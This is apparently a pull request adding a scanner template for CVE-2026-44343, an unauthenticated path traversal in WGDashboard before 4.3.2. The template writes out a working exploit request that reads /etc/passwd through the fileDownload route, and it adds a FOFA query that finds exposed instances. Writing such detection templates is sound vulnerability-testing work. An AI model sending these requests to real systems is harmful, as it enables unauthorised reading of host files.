### PR TITLE
Add CVE-2026-44343 template

### DIFF
--- a/http/cves/2026/CVE-2026-44343.yaml
+++ b/http/cves/2026/CVE-2026-44343.yaml
@@ -5,13 +5,11 @@ info:
   author: str4k3r
   severity: critical
   description: |
-    WGDashboard before 4.3.2 exposes its pre-authenticated fileDownload route
-    and joins the file parameter without containment. The traversal below
-    reads the standard /etc/passwd file outside the download directory and
-    matches its root-account record. The request is read-only and requires no
-    credentials or target-specific file.
-  impact: An unauthenticated attacker can read files accessible to the WGDashboard process.
-  remediation: Upgrade WGDashboard to 4.3.2 or later.
+    WGDashboard < 4.3.2 contains a path traversal vulnerability caused by improper access control, letting unauthorized attackers access the host file system without authentication.
+  impact: |
+    Unauthorized attackers can access the host file system, potentially exposing sensitive data and compromising the system.
+  remediation: |
+    Update to version 4.3.2 or later.
   reference:
     - https://github.com/WGDashboard/WGDashboard/security/advisories/GHSA-rrf5-q4fp-qvgm
     - https://github.com/WGDashboard/WGDashboard/commit/b15bbce9bc5554ec379d558f032c730db47fcea2
@@ -23,23 +21,36 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
   metadata:
     verified: true
-    max-request: 1
+    max-request: 2
     vendor: wgdashboard
     product: wgdashboard
     technology: Python, Flask, WireGuard management
   tags: cve,cve2026,wgdashboard,lfi,path-traversal,file-read,unauth
 
-http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/fileDownload?file=../../../../etc/passwd"
+flow: http(1) && http(2)
 
-    matchers-condition: and
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: body
-        words:
-          - "root:x:0:0:"
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(tolower(body), "wgdashboard", "wireguard")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /fileDownload?file=../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "root:x:0:0:")'
+        condition: and

--- a/http/cves/2026/CVE-2026-44343.yaml
+++ b/http/cves/2026/CVE-2026-44343.yaml
@@ -24,7 +24,7 @@ info:
     max-request: 2
     vendor: wgdashboard
     product: wgdashboard
-    technology: Python, Flask, WireGuard management
+    fofa-query: title="WGDashboard"
   tags: cve,cve2026,wgdashboard,lfi,path-traversal,file-read,unauth
 
 flow: http(1) && http(2)

--- a/http/cves/2026/CVE-2026-44343.yaml
+++ b/http/cves/2026/CVE-2026-44343.yaml
@@ -1,0 +1,45 @@
+id: CVE-2026-44343
+
+info:
+  name: WGDashboard < 4.3.2 - Unauthenticated File Read
+  author: str4k3r
+  severity: critical
+  description: |
+    WGDashboard before 4.3.2 exposes its pre-authenticated fileDownload route
+    and joins the file parameter without containment. The traversal below
+    reads the standard /etc/passwd file outside the download directory and
+    matches its root-account record. The request is read-only and requires no
+    credentials or target-specific file.
+  impact: An unauthenticated attacker can read files accessible to the WGDashboard process.
+  remediation: Upgrade WGDashboard to 4.3.2 or later.
+  reference:
+    - https://github.com/WGDashboard/WGDashboard/security/advisories/GHSA-rrf5-q4fp-qvgm
+    - https://github.com/WGDashboard/WGDashboard/commit/b15bbce9bc5554ec379d558f032c730db47fcea2
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-44343
+  classification:
+    cve-id: CVE-2026-44343
+    cwe-id: CWE-22
+    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: wgdashboard
+    product: wgdashboard
+    technology: Python, Flask, WireGuard management
+  tags: cve,cve2026,wgdashboard,lfi,path-traversal,file-read,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/fileDownload?file=../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "root:x:0:0:"


### PR DESCRIPTION
## Verification

This template checks the actual unauthenticated WGDashboard `fileDownload`
traversal against `/etc/passwd`, with no credentials or disposable marker.
The request is read-only and matches the standard root-account record.